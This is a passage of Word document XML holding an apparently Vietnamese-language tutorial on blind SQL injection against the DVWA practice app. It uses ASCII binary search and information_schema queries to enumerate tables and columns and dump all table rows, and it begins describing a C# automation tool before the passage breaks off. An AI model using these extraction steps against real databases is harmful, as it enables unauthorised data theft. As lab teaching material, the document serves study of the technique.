      </w:r>
      <w:r w:rsidR="00E16240" w:rsidRPr="00E16240">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C6497" w:rsidRDefault="005C6497" w:rsidP="005C6497">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+&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="005C6497">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Kiểm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> tra xem ký tự đầu tiên của tên database với mã ascii có lớn hơn hoặc bằng 127 không. Ta có bảng mã ASCII từ 0 tới 255 ta thực hiện phương pháp tìm kiếm nhị phân để tìm ra ký tự chính xác. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E16240" w:rsidRDefault="005C6497" w:rsidP="005C6497">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với ký tự thứ nhất đối với các ký tự tiếp theo. Đến ký tự kết thúc chuỗi là ‘\0’ có mã ascii là 0 thì ta hoàn thành việc tìm tên database hiện tại.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E16240" w:rsidRDefault="00E16240" w:rsidP="005C6497">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E81C7A" w:rsidRDefault="00E16240" w:rsidP="005C6497">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ta xác định được tên của database hiện tại ta có thể xác định tên các b</w:t>
      </w:r>
      <w:r w:rsidR="00E81C7A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">ảng trong database đó thông qua “information_schema” nơi lưu trữ tất cả các thông tin của database hiện hành bao gồm tên bảng, tên cột,.... Để tìm hiểu thêm các bảng trong database “information_schema có thể tham khảo liên kết sau: </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00E81C7A" w:rsidRPr="00E81C7A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="27"/>
          </w:rPr>
          <w:t>information_schema</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E81C7A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E16240" w:rsidRDefault="00E81C7A" w:rsidP="005C6497">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Để xác định tên các table của database hiện hành ta có thể sử dụng lệnh :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E81C7A" w:rsidRDefault="00E81C7A" w:rsidP="005C6497">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SELECT * FROM information_schema.Tables Lúc này ta sẽ có list các thông tin của table. Nhưng ta chỉ quan tâm đến những dòng có thông tin của table của database mà ta đã xác định ở trên.</w:t>
      </w:r>
      <w:r w:rsidR="008D6FEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ta có thể thêm điều kiện lọc vào câu truy vấn:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D6FEC" w:rsidRPr="005C6497" w:rsidRDefault="008D6FEC" w:rsidP="005C6497">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BA1AEA" w:rsidRDefault="008D6FEC"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SELECT * FROM information_schema.Tables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE Table_schema like “tên database hiện hành”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D6FEC" w:rsidRDefault="008D6FEC"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Lúc đó ta sẽ nhận được list các thông tin về table của database hiện hành.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D6FEC" w:rsidRDefault="008D6FEC"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Để lấy tên  của table đầu ta sử dụng cột Table_name:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D6FEC" w:rsidRDefault="008D6FEC"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Select Table_name FROM information_schema.Table WHERE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Table_schema like “tên database hiện hành”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D6FEC" w:rsidRDefault="008D6FEC"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Lúc đó ta sẽ có danh sách tên các table của database hiện hành.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D6FEC" w:rsidRDefault="008D6FEC" w:rsidP="0062545F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C131C0" w:rsidRDefault="00C131C0"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Để xác định số lượng table ta sử dụng:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C131C0" w:rsidRDefault="00C131C0" w:rsidP="0062545F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C131C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT count(*) FROM information_schema.Tables WHERE Table_schema like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>‘Tê database hiện hành’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C131C0" w:rsidRDefault="00C131C0"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Lấy tên table thứ nhất</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D6FEC" w:rsidRDefault="008D6FEC" w:rsidP="0062545F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D6FEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT TABLE_NAME FROM information_schema.Tables WHERE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">Table_schema like 'dvwa' limit </w:t>
      </w:r>
      <w:r w:rsidRPr="00C131C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="008D6FEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>,1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C131C0" w:rsidRDefault="00C131C0"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Lấy tên table thứ hai</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C131C0" w:rsidRDefault="00C131C0" w:rsidP="0062545F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C131C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT TABLE_NAME FROM information_schema.Tables WHERE Table_schema like 'dvwa' limit </w:t>
      </w:r>
      <w:r w:rsidRPr="00C131C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C131C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>,1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C131C0" w:rsidRDefault="00C131C0"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Lấy tên table thứ ba</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C131C0" w:rsidRDefault="00C131C0" w:rsidP="0062545F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C131C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT TABLE_NAME FROM information_schema.Tables WHERE Table_schema like 'dvwa' limit </w:t>
      </w:r>
      <w:r w:rsidRPr="00C131C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00C131C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>,1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C131C0" w:rsidRDefault="00C131C0"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đến khi kết hết số số lượng table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A24BEA" w:rsidRDefault="00A24BEA" w:rsidP="0062545F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A24BEA" w:rsidRDefault="00A24BEA" w:rsidP="0062545F">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Khi này ta đã có tên table trong database hiện hành, mục tiêu tiếp theo là tìm tên các cột trong từng database một: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A24BEA" w:rsidRDefault="00A24BEA"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Ta có lệnh truy vấn đếm số lượng cột của table: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A24BEA" w:rsidRDefault="00A24BEA" w:rsidP="00A24BEA">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C131C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>SELECT count(*) FROM information_schema.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Columns</w:t>
      </w:r>
      <w:r w:rsidRPr="00C131C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE Table_schema like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>‘Tê database hiện hành’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> AND TABLE_NAME like ‘Tên table’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A24BEA" w:rsidRDefault="00A24BEA"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có số lượng ta có thể lấy tên lần lượt cột của table:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A24BEA" w:rsidRDefault="00A24BEA"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Lấy tên cột đầu:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A24BEA" w:rsidRDefault="00A24BEA"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r w:rsidRPr="00C131C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">Column_name </w:t>
      </w:r>
      <w:r w:rsidRPr="00C131C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM information_schema.Tables WHERE Table_schema like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>‘Tê database hiện hành’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>AND TABLE_NAME like ‘Tên table’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> LIMIT </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24BEA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>, 1”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A24BEA" w:rsidRDefault="00A24BEA"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Lấy tên cột thứ hai:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A24BEA" w:rsidRDefault="00A24BEA"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r w:rsidRPr="00C131C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">Column_name </w:t>
      </w:r>
      <w:r w:rsidRPr="00C131C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM information_schema.Tables WHERE Table_schema like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">‘Tê database hiện hành’ AND TABLE_NAME like ‘Tên table’ LIMIT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>, 1”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A24BEA" w:rsidRDefault="00A24BEA"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với các cột tiếp theo.</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ta đã có tên database, tên table, tên cột thì ta đã có thể lấy được thông tin của table đó.</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Đầu tiên ta sẽ đếm số dòng trong table đó:</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SELECT COUNT(*) FROM ‘Tên database’.‘Tên table’</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Sau đó ta lấy lần lượt từng giá trị của từng cột một  trong từng trường một đến hết theo kiểu duyệt mảng hai chiều.</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Trường một:</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SELECT ‘Tên cột 1’ FROM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>‘Tên database’.‘Tên table’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> Limit 0,1</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SELECT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>‘Tên cột 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>’ FROM ‘Tên database’.‘Tên table’ Limit 0,1</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SELECT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>‘Tên cột n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>’ FROM ‘Tên database’.‘Tên table’ Limit 0,1</w:t>
      </w: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p>
    <w:p w:rsidR="00B53A15" w:rsidRDefault="00B53A15" w:rsidP="00A24BEA">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Trường thứ hai:</w:t>
      </w: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SELECT ‘Tên cột 1’ FROM ‘Tên database’.‘Tên table’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> Limit 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>,1</w:t>
      </w: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SELECT ‘Tên cột 2’ FROM ‘Tên database’.‘Tên table’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> Limit 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>,1</w:t>
      </w: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w:t>
      </w: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SELECT ‘Tên cột n’ FROM ‘Tên database’.‘Tên table’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> Limit 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>,1</w:t>
      </w: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đến khi hết bảng.</w:t>
      </w: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p>
    <w:p w:rsidR="00B53A15" w:rsidRDefault="00B53A15"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Lúc đó ta đã có toàn bộ thông tin của table trong database trên.</w:t>
      </w:r>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Tương tự đối với các table còn lại, ta có thể lấy được toàn bộ dữ liệu của database. </w:t>
      </w:r>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Công Cụ</w:t>
      </w:r>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Mô tả: Công cụ chỉ hỗ trợ dò dữ liệu từ database thông qua việc gửi request lên database và nhận respond từ database để phân tích và xử lý. Công cụ được viết bằng ngôn ngữ C#. </w:t>
      </w:r>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lastRenderedPageBreak/>
        <w:t>Cách thức hoạt động: Ững dụng sẽ tự động điền dữ liệu vào textbox và sau đó submit(Gửi request) sau đó sẽ phân tích và xử lý kết quả trả về thông qua text hiển thị trên màn hình.</w:t>
      </w:r>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nhấn nút ‘Get database name’: Tool sẽ thực hiện câu truy vấn:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A1752" w:rsidRPr="001A1752" w:rsidRDefault="001A1752" w:rsidP="001A1752">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
